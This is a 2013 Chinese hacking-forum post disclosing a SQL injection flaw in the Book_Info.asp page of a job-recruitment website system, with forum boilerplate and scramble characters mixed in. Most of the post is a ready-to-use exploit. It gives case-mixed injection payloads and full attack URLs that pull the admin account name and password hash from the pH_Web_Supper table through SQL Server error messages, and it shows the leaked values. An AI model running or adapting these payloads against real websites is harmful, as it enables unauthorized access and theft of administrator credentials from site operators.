找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2322|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
: C  d! S  X3 F# W1 w9 N
; r$ _$ X# x: f6 {3 z: S此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出5 N. k. m# Z9 w" X& o

: T0 t1 X' ?' f$ L9 ]exp:如下% k+ F" S/ B( T' f  L: i
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
+ E; |% L: M2 `查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# ]) Q( W- A+ S

( q+ ^. c  C4 D& n- Q: _# [http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 z! V( ~2 s/ [  c0 ~ 3 Y, e: T% |1 A1 A3 m" C* K
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
# U) D8 ~6 `' X, w# X: V3 m; a   Z" ^, T( L+ f2 Z$ n  j
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
* l, S% }0 {% @$ D7 k/ s& u ( P0 Y8 T6 D# b5 d
/Educate/Book_Info.asp,行 8
; f1 p; A/ s! P, b6 U5 ?3 C8 y
: i% b: U) d; ?4 j6 F# ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)8 K' |1 x! r" S7 G

4 U: c5 M0 M! g; k, ^Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
0 y) h% \  M2 r
% f7 I8 l4 x1 L  U; m将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
0 j* o; B8 Y( Y. o6 q0 Y& j0 a. Z ' {, l+ O( M, A- {3 h" x  m
/Educate/Book_Info.asp,行 8
. v% O$ w  V5 o9 n0 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表